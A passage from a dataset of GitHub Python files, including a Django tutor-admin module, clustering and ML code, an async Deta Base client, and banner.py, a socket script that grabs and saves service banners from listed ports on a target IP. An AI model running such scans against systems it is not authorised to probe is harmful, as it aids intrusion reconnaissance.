request.POST.get(\"application_step\")\n if current_step or application_step:\n for tutor in queryset.all():\n tutor.notify_to_update_step(application_step, current_step)\n tutor.add_remark_action(\n {\"action\": \"update_step\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Notified tutors to update step\")\n else:\n self.message_user(\n request, \"Current step or application step missing\", messages.ERROR\n )\n\n def re_approve_tutors(self, request, queryset):\n for q in queryset:\n q.notify_to_update_step(None, \"complete\", sendMail=False)\n user_ids = queryset.values_list(\"pk\", flat=True)\n UserProfile.objects.filter(user_id__in=list(user_ids)).update(\n application_status=UserProfile.VERIFIED\n )\n self.message_user(request, \"Application status changed to approved\")\n\n def revert_approval_status(self, request, queryset):\n user_ids = queryset.values_list(\"pk\", flat=True)\n UserProfile.objects.filter(user_id__in=list(user_ids)).update(\n application_status=UserProfile.PENDING\n )\n self.message_user(request, \"Application status changed to pending\")\n\n def export_as_csv(self, request, queryset):\n \"\"\"Ability to export all the details about tutor applicants\"\"\"\n rows = (\n [\n obj.resolve_field([\"firstName\", \"lastName\"]),\n obj.resolve_field(\"phone\"),\n obj.email,\n obj.profile.get_application_status_display(),\n obj.current_step,\n obj.application_step,\n obj.determine_completed_steps(),\n ]\n for obj in queryset.prefetch_related(\"profile\").all()\n )\n response = streaming_response(rows, \"all_tutor_applicants\")\n return response\n\n def freeze_tutor_profile(self, request, queryset):\n # this is a two step action. the first is to change the tutor\n # application status to frozen and the second is to mark all\n # active and pending subjects as suspended\n for k in queryset.all():\n TutorSkill.objects.filter(\n tutor_id=k.id, status__in=[TutorSkill.ACTIVE, TutorSkill.PENDING]\n ).update(status=TutorSkill.SUSPENDED)\n k.to_mailing_list()\n user_ids = queryset.values_list(\"pk\", flat=True)\n UserProfile.objects.filter(user_id__in=list(user_ids)).update(\n application_status=UserProfile.FROZEN\n )\n self.message_user(request, \"Frozen account successful\")\n\n def update_approved_tutors_status(self, request, queryset):\n for q in queryset:\n q.notify_to_update_step(None, \"application-verified\", sendMail=False)\n self.message_user(\n request,\n \"All approved tutor 'current-step' updated to 'application verified'\",\n )\n\n def update_current_step_for_existing_tutors(self, request, queryset):\n counter = 0\n for q in queryset:\n if q.approved:\n q.update_verified_tutors_current_step()\n counter += 1\n q.to_mailing_list()\n self.message_user(request, f\"{counter} verified tutors 'current-step' updated\")\n\n def update_not_approved_tutors_status(self, request, queryset):\n counter = 0\n for q in queryset:\n result = q.update_applicant_to_complete()\n if result:\n counter += 1\n q.to_mailing_list()\n self.message_user(request, f\"{counter} applicants moved to completed\")\n\n def sync_to_mailing_list(self, request, queryset):\n for i in queryset:\n i.to_mailing_list()\n\n\n@admin.register(NewTutorApplicant)\nclass NewTutorApplicantAdmin(TutorApplicantTrackAdmin):\n date_hierarchy = \"date_joined\"\n actions = [\n \"approve_applicant\",\n \"deny_applicant\",\n \"approve_identity\",\n \"reject_identity\",\n \"reupload_video_intro\",\n ]\n list_filter = [\n GenderFilter,\n IdentityApprovedFilter,\n VideoSummaryApprovedFilter,\n GuarantorsApprovedFilter,\n StateFilter,\n ]\n list_display = TutorApplicantTrackAdmin.main_fields\n actions = [\"approve_applicant\", \"deny_applicant\"]\n\n def get_queryset(self, request):\n return (\n super()\n .get_queryset(request)\n .exclude(\n profile__application_status__in=[\n UserProfile.VERIFIED,\n UserProfile.DENIED,\n ]\n )\n # .by_current_step([\"application-verified\"], True)\n .by_current_step(\n [\"complete\", \"application-verified\", \"terms\", \"preferences\"], True\n )\n )\n\n def user_identity_info(self, obj):\n res = \"\"\n if obj.user_identity_info:\n if obj.tutor_id_verified:\n return \"Identity approved\"\n res += \"\"\"\n <button type=\"button\" data-info=\"{}\" data-email=\"{}\" data-button-type=\"identity\"\n class=\"btn btn-primary btn-sm clientRequestJs {}\" style=\"font-size: 10px;\">\n Verify identity</button>\n \"\"\".format(\n escapejs(\n json.dumps(\n {\n \"personal_info\": obj.revamp_data(\"personalInfo\"),\n \"identity\": obj.revamp_data(\"identity\"),\n \"actual_id\": obj.user_identity_info,\n \"user_id\": obj.pk,\n }\n )\n ),\n obj.email,\n f\"id_{obj.pk}\",\n )\n\n return res\n\n user_identity_info.allow_tags = True\n user_identity_info.short_description = \"Identity\"\n\n def video_intro(self, obj):\n res = \"\"\n if obj.video_verified:\n return \"Video approved\"\n if obj.video_intro:\n res += \"\"\"\n <button type=\"button\" data-info=\"{}\" data-email=\"{}\" data-button-type=\"video\"\n class=\"btn btn-primary btn-sm clientRequestJs {}\" style=\"font-size: 10px;\">\n Review video</button>\n \"\"\".format(\n escapejs(\n json.dumps(\n {\n \"personal_info\": obj.revamp_data(\"personalInfo\"),\n \"user_id\": obj.pk,\n \"others\": obj.revamp_data(\"others\"),\n }\n )\n ),\n obj.email,\n f\"id_{obj.pk}\",\n )\n\n return res\n\n video_intro.allow_tags = True\n video_intro.short_description = \"Video summary\"\n\n def references(self, obj: NewTutorApplicant):\n res = \"\"\n if obj.guarantors_approved():\n return \"Guarantors approved\"\n if obj.guarantors:\n res += \"\"\"\n <button type=\"button\" data-info=\"{}\"\n class=\"btn btn-primary btn-sm referencesBtn {}\" style=\"font-size: 10px;\">\n Review guarantors</button>\n \"\"\".format(\n escapejs(json.dumps({\"guarantors\": obj.guarantors, \"user_id\": obj.pk})),\n f\"id_{obj.pk}\",\n )\n return res\n\n references.allow_tags = True\n\n # admin actions\n def approve_applicant(self, request, queryset):\n for tutor in queryset.all():\n tutor.approve_applicant()\n tutor.add_remark_action(\n {\"action\": \"approve_tutor\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Applications approved\")\n\n\n def deny_applicant(self, request, queryset):\n for tutor in queryset.all():\n tutor.deny_applicant()\n tutor.add_remark_action(\n {\"action\": \"deny_tutor\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Applications denied\")\n\n\n@admin.register(Reference)\nclass ReferenceAdmin(admin.ModelAdmin):\n list_display = [\n \"tutor\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"no_of_years\",\n \"phone_no\",\n \"organization\",\n \"verified\",\n ]\n search_fields = [\"tutor__email\"]\n actions = [\"verify_guarantor\"]\n form = GuarantorForm\n\n def phone_no(self, obj):\n if obj.phone_no:\n return str(obj.phone_no)\n return \"\"\n\n def verify_guarantor(self, request, queryset):\n queryset.update(verified=True)\n\n def deny_guarantor(self, request, queryset):\n for q in queryset.all():\n notification_on_guarantor_delete.delay(q.pk)\n\n\n@admin.register(VerifiedTutor)\nclass VerifiedTutorAdmin(RVerifiedTutorAdmin):\n pass\n\n\n@admin.register(VerifiedTutorWithSkill)\nclass VerifiedTutorSkillsAdmin(RVerifiedTutorSkillsAdmin):\n pass\n\n\n@admin.register(TutorRevamp)\nclass TutorRevampAdmin(RTutorRevampAdmin):\n pass\n\n\n@admin.register(TutorSkill)\nclass TutorSkillAdmin(RTutorSkillAdmin):\n pass\n\n\n@admin.register(QuizSitting)\nclass QuizSittingAdmin(RQuizSittingAdmin):\n pass\n\n\n@admin.register(Skill)\nclass SkillAdmin(RSkillAdmin):\n pass\n","repo_name":"Jovimanical/main-codebase","sub_path":"tuteria/tutor_management/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":27909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23118782772","text":"import os\nfrom loguru import logger\nfrom helpers.matrix import read_matrix\n\n\n@logger.catch()\ndef read_object(user, name):\n if os.path.isfile(f'./system/{name}'):\n matrix = read_matrix()\n if matrix[f'./system/{name}'].get(user) \\\n and 'read' in matrix[f'./system/{name}'][user]:\n with open(f'./system/{name}', 'r', encoding=\"utf-8\") as f:\n print(f.read())\n logger.info(f'Access is allowed')\n else:\n logger.error(f'Access denied')\n else:\n logger.error(f'The file with the name \"{name}\" does not exist')\n","repo_name":"Baykanurov/HRU","sub_path":"modules/read_object.py","file_name":"read_object.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10245768936","text":"\nimport numpy as np\nimport pandas as pd\nfrom vtreat.util import grouped_by_x_statistics, pooled_impact_estimate\nfrom vtreat.vtreat_impl import fit_binomial_impact_code, fit_regression_impact_code\n\n\ndef test_grouped_stats():\n # from: https://github.com/WinVector/Examples/blob/main/PartialPooling/PartialPooling.ipynb\n # set state of pseudo random number generator for repeatability\n rng = np.random.default_rng(2023)\n # set parameters to specific values\n example_between_locations_sd = 3.0\n example_per_observations_sd = 10.0\n n_locations = 10\n n_obs_per_location = 3\n\n def generate_example_centers() -> pd.DataFrame:\n \"\"\"generate the unobserved location values\"\"\"\n example_location_value_mean = rng.normal(loc=0, scale=15, size=1)\n example_locations = pd.DataFrame({\n \"location_id\": range(n_locations),\n \"effect\": rng.normal(\n loc=example_location_value_mean, \n scale=example_between_locations_sd, \n size=n_locations)\n })\n return example_locations\n \n example_locations = generate_example_centers()\n\n def generate_observations(example_locations: pd.DataFrame)-> pd.DataFrame:\n \"\"\"\n generate observed data\n\n :param example_locations: the (unobserved) ground truth to generate from\n :return: observed data\n \"\"\"\n assert isinstance(example_locations, pd.DataFrame)\n observations = []\n for j in range(example_locations.shape[0]):\n obs_j = pd.DataFrame({\n \"location_id\": j,\n \"observation\": rng.normal(\n loc=example_locations.effect[j], \n scale=example_per_observations_sd, \n size=n_obs_per_location),\n })\n observations.append(obs_j)\n observations = pd.concat(observations, ignore_index=True)\n return observations\n\n observations = generate_observations(example_locations)\n grouped_stats = grouped_by_x_statistics(observations[\"location_id\"], observations[\"observation\"])\n assert isinstance(grouped_stats, pd.DataFrame)\n pooled_stats = pooled_impact_estimate(observations[\"location_id\"], observations[\"observation\"])\n assert isinstance(pooled_stats, pd.DataFrame)\n assert grouped_stats.shape[0] == pooled_stats.shape[0]\n assert np.all(pooled_stats['x'] == grouped_stats['x'])\n xform = fit_binomial_impact_code(\n incoming_column_name=\"test\",\n x=observations[\"location_id\"],\n y=observations[\"observation\"] >= 0,\n extra_args={\"outcome_target\": True, \"var_suffix\": \"_v\"},\n params={\"use_hierarchical_estimate\": True},\n )\n xfc = xform.code_book_\n assert isinstance(xfc, pd.DataFrame)\n v = \"test_logit_code_v\"\n assert np.max(xfc[v]) > np.min(xfc[v])\n xform = fit_regression_impact_code(\n incoming_column_name=\"test\",\n x=observations[\"location_id\"],\n y=observations[\"observation\"],\n extra_args={\"var_suffix\": \"_v\"},\n params={\"use_hierarchical_estimate\": True},\n )\n xfc = xform.code_book_\n assert isinstance(xfc, pd.DataFrame)\n v = \"test_impact_code\"\n assert np.max(xfc[v]) > np.min(xfc[v])\n\n","repo_name":"WinVector/pyvtreat","sub_path":"pkg/tests/test_grouped_stats.py","file_name":"test_grouped_stats.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"16"} +{"seq_id":"436624660","text":"import math\r\nimport random\r\nimport numpy as np\r\n\r\n#datapoint class\r\nclass Datapoint:\r\n def __init__(self,attr,op=''):\r\n self.attr=attr\r\n self.op = op\r\n\r\n def display(self):\r\n print(self.attr,'\\t\\t',self.op)\r\n\r\n def dist_from(self,point):\r\n d = 0\r\n for i in range(len(self.attr)):\r\n d += (point[i]-self.attr[i])**2\r\n return math.sqrt(d)\r\n\r\n#load data\r\ndataset = []\r\nfile = open('iris.data','r')\r\nlines = file.readlines()[:-1]\r\nfile.close()\r\n#index=0\r\nfor line in lines:\r\n op = line.split(',')[-1]\r\n attr = list(map(float,line.split(',')[:-1]))\r\n d1 = Datapoint(attr,op)\r\n dataset.append(d1)\r\n\r\n\r\n#mean function\r\ndef medoid(datapoints):\r\n mean = [0]*len(datapoints[0].attr)\r\n count = len(datapoints)\r\n for i in range(len(datapoints[0].attr)):\r\n for datapoint in datapoints:\r\n mean[i] += datapoint.attr[i]\r\n mean[i] = mean[i]/count\r\n\r\n reqd_dp = datapoints[0]\r\n mn = 1000\r\n for datapoint in datapoints:\r\n if datapoint.dist_from(mean) < mn:\r\n reqd_dp = datapoint\r\n mn = datapoint.dist_from(mean)\r\n \r\n return reqd_dp.attr\r\n\r\n\r\n#cluster class\r\nclass Cluster:\r\n def __init__(self,datapoints):\r\n self.datapoints = datapoints\r\n self.count = len(self.datapoints)\r\n self.medoid = medoid(self.datapoints)\r\n\r\n def re_init(self):\r\n self.datapoints = []\r\n self.count = 0\r\n\r\n def addDatapoint(self,datapoint):\r\n self.datapoints.append(datapoint)\r\n self.count += 1\r\n self.medoid = medoid(self.datapoints)\r\n\r\n def display(self):\r\n print('Medoid is ',self.medoid)\r\n print('Datapoints are ')\r\n for datapoint in self.datapoints:\r\n datapoint.display()\r\n\r\n\r\n#function for distance of datapoint from a cluster\r\ndef distance(datapoint,cluster):\r\n p1 = datapoint.attr\r\n p2 = cluster.medoid\r\n d = 0\r\n for i in range(len(p2)):\r\n d += (p1[i]-p2[i])**2\r\n return math.sqrt(d)\r\n\r\n \r\n\r\n#initiate random clusters\r\nclist = []\r\nk=3\r\nfor i in range(k):\r\n rint = random.randint(0,len(dataset)-1)\r\n c1 = Cluster([dataset[rint]])\r\n clist.append(c1)\r\n\r\nfor cluster in clist:\r\n cluster.display()\r\n\r\n\r\n#main program\r\nprev_medoid = []\r\nfor i in range(k):\r\n prev_medoid .append([0]*len(dataset[0].attr))\r\n\r\nwhile True:\r\n for datapoint in dataset:\r\n min_dist=1000\r\n min_cluster=clist[0]\r\n for cluster in clist:\r\n if distance(datapoint,cluster) < min_dist:\r\n min_dist = distance(datapoint,cluster)\r\n min_cluster = cluster\r\n min_cluster.addDatapoint(datapoint)\r\n\r\n curr_medoid = []\r\n for cluster in clist:\r\n curr_medoid.append(cluster.medoid)\r\n\r\n print('Medoid ',curr_medoid)\r\n\r\n if curr_medoid == prev_medoid:\r\n break\r\n\r\n prev_medoid = curr_medoid\r\n\r\n for cluster in clist:\r\n cluster.re_init()\r\n\r\nindex = 0\r\nfor cluster in clist:\r\n print('Cluster ',index)\r\n cluster.display()\r\n\r\n\r\n#125/150\r\n\r\n\r\n","repo_name":"ableabhinav/dwdmlabs","sub_path":"5. Clustering/kmedoids.py","file_name":"kmedoids.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69796635527","text":"import torch\nfrom torch import nn\n\nclass GlobalSpatialAttention(nn.Module):\n def __init__(self, in_channels, num_reduced_channels):\n super().__init__()\n \n self.conv1x1_q = nn.Conv2d(in_channels, num_reduced_channels, 1, 1)\n self.conv1x1_k = nn.Conv2d(in_channels, num_reduced_channels, 1, 1)\n self.conv1x1_v = nn.Conv2d(in_channels, num_reduced_channels, 1, 1)\n self.conv1x1_att = nn.Conv2d(num_reduced_channels, in_channels, 1, 1)\n \n def forward(self, feature_maps, global_channel_output):\n query = self.conv1x1_q(feature_maps)\n N, C, H, W = query.shape\n query = query.reshape(N, C, -1)\n key = self.conv1x1_k(feature_maps).reshape(N, C, -1)\n \n query_key = torch.bmm(key.permute(0, 2, 1), query)\n query_key = query_key.reshape(N, -1).softmax(-1)\n query_key = query_key.reshape(N, int(H*W), int(H*W))\n value = self.conv1x1_v(feature_maps).reshape(N, C, -1)\n att = torch.bmm(value, query_key).reshape(N, C, H, W)\n att = self.conv1x1_att(att)\n \n return (global_channel_output * att) + global_channel_output\n","repo_name":"LinkAnJarad/global_local_attention_module_pytorch","sub_path":"global_local_attention_module_pytorch/global_spatial_attention.py","file_name":"global_spatial_attention.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"30041629575","text":"import socket, sys, requests\n\nip = sys.argv[1]\n\nfile = open(sys.argv[2], \"r\")\n\nfor linha in file.readlines():\n porta = linha.split(\":\")\n porta = int(porta[1].strip())\n try:\n socket.setdefaulttimeout(15)\n s = socket.socket()\n s.connect((ip, porta))\n if porta == 80 or porta == 443:\n http_request = 'GET HTPP/1.1 \\r\\n'\n s.send(http_request.encode())\n\n banner = s.recv(2048)\n banner = banner.decode()\n s.close()\n print(\"[+] \" + ip + \" >>> \" + str(banner))\n\n arquivo = open(\"servicos_\" + ip + \".txt\", \"+a\")\n arquivo.write(\"Servico da porta: \" + str(porta))\n arquivo.write(str(banner) + '\\n')\n arquivo.close()\n except:\n print(\"Nao foi possivel detectar o banner\")\n","repo_name":"mauricioomateus/ferramentas-scan","sub_path":"banner.py","file_name":"banner.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25880934043","text":"\"\"\"Async Deta Base module.\r\n\r\nAsync implementation of DetaBase.\r\n\"\"\"\r\n\r\nfrom http import HTTPStatus\r\nfrom types import TracebackType\r\nfrom typing import Any, Optional\r\n\r\nfrom aiohttp import ClientSession, ClientTimeout\r\n\r\nfrom deta_py.deta_base.queries import ItemUpdate, Query\r\nfrom deta_py.deta_base.results import QueryResult\r\nfrom deta_py.deta_base.utils import (\r\n BASE_API_URL,\r\n ITEMS_BATCH_SIZE,\r\n REQUEST_TIMEOUT,\r\n ExpireAt,\r\n ExpireIn,\r\n insert_ttl,\r\n)\r\nfrom deta_py.utils import parse_data_key\r\n\r\n\r\nclass AsyncDetaBase(object): # noqa: WPS214\r\n \"\"\"Async Deta Base client.\"\"\"\r\n\r\n def __init__(self, data_key: str, base_name: str):\r\n \"\"\"Init async Deta Base client.\r\n\r\n You can generate Data Key in your project or collection settings.\r\n\r\n New aiohttp session is initialized.\r\n Don't forget to call `base.close()` to close connection.\r\n\r\n Args:\r\n data_key (str): Deta project data key.\r\n base_name (str): Deta Base name.\r\n \"\"\"\r\n self.data_key = data_key\r\n self.base_name = base_name\r\n\r\n project_id, _ = parse_data_key(data_key)\r\n self.base_url = BASE_API_URL.format(\r\n project_id=project_id,\r\n base_name=base_name,\r\n )\r\n\r\n self._session = ClientSession(\r\n headers={\r\n 'X-API-Key': self.data_key,\r\n 'Content-Type': 'application/json',\r\n },\r\n timeout=ClientTimeout(total=REQUEST_TIMEOUT),\r\n )\r\n\r\n async def put(\r\n self,\r\n *items: dict[str, Any],\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> list[dict[str, Any]]:\r\n \"\"\"Put items to the base.\r\n\r\n If item with the same key already exists, it will be overwritten.\r\n\r\n Items are splitted into batches of 25 items and put in parallel.\r\n\r\n You can specify either expire_at or expire_in to set item TTL.\r\n If both are specified, expire_at will be used.\r\n\r\n Args:\r\n items (dict[str, Any]): Items to put.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n list[dict[str, Any]]: List of successfully processed items.\r\n \"\"\"\r\n processed = []\r\n while items:\r\n batch_items = list(items[:ITEMS_BATCH_SIZE])\r\n items = items[ITEMS_BATCH_SIZE:]\r\n batch_processed = await self._put_batch(\r\n batch_items,\r\n expire_at=expire_at,\r\n expire_in=expire_in,\r\n )\r\n processed.extend(batch_processed)\r\n\r\n return processed\r\n\r\n async def get(self, key: str) -> Optional[dict[str, Any]]:\r\n \"\"\"Get item from the base.\r\n\r\n Args:\r\n key (str): Item key.\r\n\r\n Returns:\r\n Optional[dict[str, Any]]: Item or None if not found.\r\n \"\"\"\r\n async with self._session.get(\r\n self._get_url('/items/{key}', key=key),\r\n ) as response:\r\n if response.status == HTTPStatus.OK:\r\n item: dict[str, Any] = await response.json()\r\n return item\r\n return None\r\n\r\n async def delete(self, key: str) -> None:\r\n \"\"\"Delete item from the base.\r\n\r\n Args:\r\n key (str): Item key.\r\n \"\"\"\r\n # probably some response processing will be added in future,\r\n # so empty manager body currently ignored\r\n async with self._session.delete( # noqa: WPS328\r\n self._get_url('/items/{key}', key=key),\r\n ):\r\n pass # noqa: WPS420\r\n\r\n async def insert(\r\n self,\r\n item: dict[str, Any],\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> Optional[dict[str, Any]]:\r\n \"\"\"Insert item to the base.\r\n\r\n If item with the same key already exists, it will not be inserted.\r\n\r\n You can specify either expire_at or expire_in to set item TTL.\r\n If both are specified, expire_at will be used.\r\n\r\n Args:\r\n item (dict[str, Any]): Item to insert.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n Optional[dict[str, Any]]: Inserted item \\\r\n or None if item with the same key already exists.\r\n \"\"\"\r\n item = insert_ttl(item, expire_at, expire_in)\r\n async with self._session.post(\r\n self._get_url('/items'),\r\n json={'item': item},\r\n ) as response:\r\n if response.status == HTTPStatus.CREATED:\r\n inserted_item: dict[str, Any] = await response.json()\r\n return inserted_item\r\n return None\r\n\r\n async def update(\r\n self,\r\n key: str,\r\n operations: ItemUpdate,\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> bool:\r\n \"\"\"Update item in the base.\r\n\r\n You can specify either expire_at or expire_in to set item TTL.\r\n If both are specified, expire_at will be used.\r\n\r\n Example:\r\n >>> operations = ItemUpdate()\r\n >>> operations.set(name='John')\r\n >>> operations.increment(age=1)\r\n >>> operations.append(friends=['Jane'])\r\n >>> operations.delete('hobbies')\r\n >>> await base.update(operations)\r\n\r\n Args:\r\n key (str): Item key.\r\n operations (ItemUpdate): Update operations.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n bool: True if item was updated, False if not found.\r\n \"\"\"\r\n operations.set(**insert_ttl({}, expire_at, expire_in))\r\n async with self._session.patch(\r\n self._get_url('/items/{key}', key=key),\r\n json=operations.as_json(),\r\n ) as response:\r\n return response.status == HTTPStatus.OK\r\n\r\n async def query(\r\n self,\r\n query: Optional[Query] = None,\r\n limit: int = 1000,\r\n last: Optional[str] = None,\r\n ) -> QueryResult:\r\n \"\"\"Fetch items in the base.\r\n\r\n If result contains more than 1000 items, it will be paginated.\r\n\r\n You can use `last` key from the previous query to get next page.\r\n Example:\r\n >>> query = [{'age': {'$gt': 18}}]\r\n >>> res = base.query(query)\r\n >>> items = res.items\r\n >>> while res.last:\r\n ... res = db.fetch(last=res.last)\r\n ... items += res.items\r\n\r\n Args:\r\n query (Optional[Query]): List of queries.\r\n limit (int): Limit of items to return.\r\n last (Optional[str]): Last key of the previous query.\r\n\r\n Returns:\r\n QueryResult: Query result.\r\n \"\"\"\r\n if isinstance(query, dict):\r\n query = [query]\r\n\r\n async with self._session.post(\r\n self._get_url('/query'),\r\n json={\r\n 'query': query,\r\n 'limit': limit,\r\n 'last': last,\r\n },\r\n ) as response:\r\n if response.status == HTTPStatus.OK:\r\n data: dict[str, Any] = await response.json()\r\n return QueryResult(\r\n items=data['items'],\r\n count=data['paging']['size'],\r\n last=data['paging'].get('last'),\r\n )\r\n\r\n return QueryResult(items=[], count=0, last=None)\r\n\r\n async def __aenter__(self) -> 'AsyncDetaBase':\r\n \"\"\"Enter context manager.\r\n\r\n Returns:\r\n DetaBase: Deta Base client.\r\n \"\"\"\r\n return self\r\n\r\n async def __aexit__(\r\n self,\r\n exc_type: Optional[type[BaseException]],\r\n exc_value: Optional[BaseException],\r\n exc_traceback: Optional[TracebackType],\r\n ) -> None:\r\n \"\"\"Exit context manager.\r\n\r\n Args:\r\n exc_type (Optional[type[BaseException]]): Exception type.\r\n exc_value (Optional[BaseException]): Exception value.\r\n exc_traceback (Optional[TracebackType]): Exception traceback.\r\n \"\"\"\r\n await self.close()\r\n\r\n async def close(self) -> None:\r\n \"\"\"Close aiohttp session.\"\"\"\r\n await self._session.close()\r\n\r\n async def _put_batch(\r\n self,\r\n batch_items: list[dict[str, Any]],\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> list[dict[str, Any]]:\r\n \"\"\"Put batch of items to the base.\r\n\r\n Args:\r\n batch_items (list[dict[str, Any]]): Items to put.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n list[dict[str, Any]]: List of successfully processed items.\r\n \"\"\"\r\n batch_items = [\r\n insert_ttl(item, expire_at, expire_in)\r\n for item in batch_items\r\n ]\r\n async with self._session.put(\r\n self._get_url('/items'),\r\n json={'items': batch_items},\r\n ) as response:\r\n if response.status == HTTPStatus.MULTI_STATUS:\r\n data = await response.json()\r\n items: list[dict[str, Any]] = data['processed']['items']\r\n return items\r\n\r\n return []\r\n\r\n def _get_url(self, path: str, **kwargs: str) -> str:\r\n \"\"\"Return full url for the given path.\r\n\r\n Args:\r\n path (str): Relative path.\r\n kwargs (str): Path params.\r\n\r\n Returns:\r\n str: Full url.\r\n \"\"\"\r\n return self.base_url + path.format(**kwargs)\r\n","repo_name":"butvinm/deta_py","sub_path":"deta_py/deta_base/async_base.py","file_name":"async_base.py","file_ext":"py","file_size_in_byte":9918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73403520008","text":"# https://www.acmicpc.net/problem/4963\n\n# 섬(덩어리)의 개수\n\n# 대각선에 섬이 있어도 인접하다고 써 있으므로\n# 8방향 탐색하는 DFS를 설계해야 함\n\n\n\nimport sys\nsys.stdin = open(\"4963.txt\")\n\n# [상하좌우+대각선 델타값]\n# 특정 섬 (x,y)를 기준으로 할 때, 이로부터 탐색해야 하는 8방향\noctagon = [(-1,-1),(-1,0),(-1,1),(0,-1),(0,1),(1,-1),(1,0),(1,1)]\n\nwhile True:\n # 각 테스트 케이스 마다 지도의 넓이(w), 높이(h)가 주어짐\n w, h = map(int, input().split())\n # 종료 조건: w, h 입력 값이 0, 0 일 때\n if not w and not h:\n break\n # if w == 0 and h == 0:\n # break 이런 식으로 종료조건을 작성해도 됨\n\n # 둘째 줄부터 h개의 줄에는 지도가 주어진다.\n matrix = [list(map(int,input().split())) for _ in range(h)]\n\n # w(너비)*h(높이)로 입력된 matrix 는 이차원 격자로,\n # 이중 for문 작성해서 x,y 좌표가 매칭되는 stack 작성\n # matrix[i][j] = 0 이면 바다가 등장해서 섬이 끊긴 것 cnt += 1\n cnt = 0\n for i in range(h):\n for j in range(w):\n if matrix[i][j]:\n stack = [(i,j)]\n matrix[i][j] = 0\n cnt += 1\n\n # 스택이 빌 때까지(돌아갈 곳이 없을 때까지) 반복:\n while stack:\n # 현재 방문 정점(후입선출)\n x,y = stack.pop()\n\n # 델타값을 이용한 상하좌우+대각선(octagon) 탐색\n # matrix 에서 뽑은 x,y 값의 쌍(stack)에 대해\n # octagon 의 변량값 r,c를 각각 더하면서 8방향 탐색\n for r,c in octagon:\n dx = x + r\n dy = y + c\n\n # dx, dy 값이 경계값에 맞게 들어가면:\n # = 이동할 수 있는 있는 곳에 있다면:\n # stack 에 저장해서 계속 8방향 탐색하며 나아갈 수 있게하기\n # 이때 matrix[dx][dy] 는 아직 방문하지 않았으므로 False 처리\n if h > dx >= 0 and w > dy >= 0 and matrix[dx][dy]:\n stack.append((dx, dy))\n matrix[dx][dy] = False\n\n # 각 테스트 케이스에 대해서, 섬의 개수를 출력한다.\n print(cnt)\n\n\n'''\n[DFS 3가지 패턴]\n1. 상, 하, 좌, 우 패턴\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\n2. 대각선 + 상, 하, 좌, 우 패턴\ndx = [-1, -1, -1, 0, 0, 1, 1, 1]\ndy = [-1, 0, 1, -1, 1, -1, 0, 1]\n3. 대각선 패턴\ndx = [-1, -1, 1, 1]\ndy = [-1, 1, -1, 1]\n'''","repo_name":"code-sum/Algorithm","sub_path":"BOJ/220811/4963.py","file_name":"4963.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"22864424348","text":"import math\nimport os\nimport shutil\nimport tempfile\nfrom functools import partial\nfrom shutil import ignore_patterns\nfrom typing import Callable, Dict, Optional, Tuple, Union\n\nimport json\nimport torch\nfrom torch import distributed as dist\nfrom torch import nn\nfrom torch.utils.data import Dataset\n\nfrom modelscope.hub.file_download import model_file_download\nfrom modelscope.metainfo import Trainers\nfrom modelscope.models.base import Model, TorchModel\nfrom modelscope.msdatasets.ms_dataset import MsDataset\nfrom modelscope.preprocessors.base import Preprocessor\nfrom modelscope.preprocessors.multi_modal import OfaPreprocessor\nfrom modelscope.preprocessors.ofa.utils.collate import collate_fn\nfrom modelscope.trainers import EpochBasedTrainer\nfrom modelscope.trainers.builder import TRAINERS\nfrom modelscope.trainers.optimizer.builder import build_optimizer\nfrom modelscope.trainers.parallel.utils import is_parallel\nfrom modelscope.utils.config import Config\nfrom modelscope.utils.constant import (DEFAULT_MODEL_REVISION, ConfigKeys,\n Invoke, ModeKeys, ModelFile)\nfrom .ofa_trainer_utils import (AdjustLabelSmoothedCrossEntropyCriterion,\n get_schedule, recursive_overwrite)\n\n\n@TRAINERS.register_module(module_name=Trainers.ofa)\nclass OFATrainer(EpochBasedTrainer):\n r\"\"\"\n OFA trainer for MaaS.\n\n Args:\n model (`str`): A model dir or a model id to be loaded\n cfg_file (`str`, **optional**, default to `None`):\n A config dir\n cfg_modify_fn (`Callable`, **optional**, default to `None`):\n A function which can rebuild the config file.\n arg_parse_fn (`Callable`, **optional**, default to `None`):\n Same as ``parse_fn`` in :obj:`Config.to_args`.\n data_collator (`Callable`, **optional**, default to `None`):\n The function to use to form a batch from a list of elements\n of `train_dataset` or 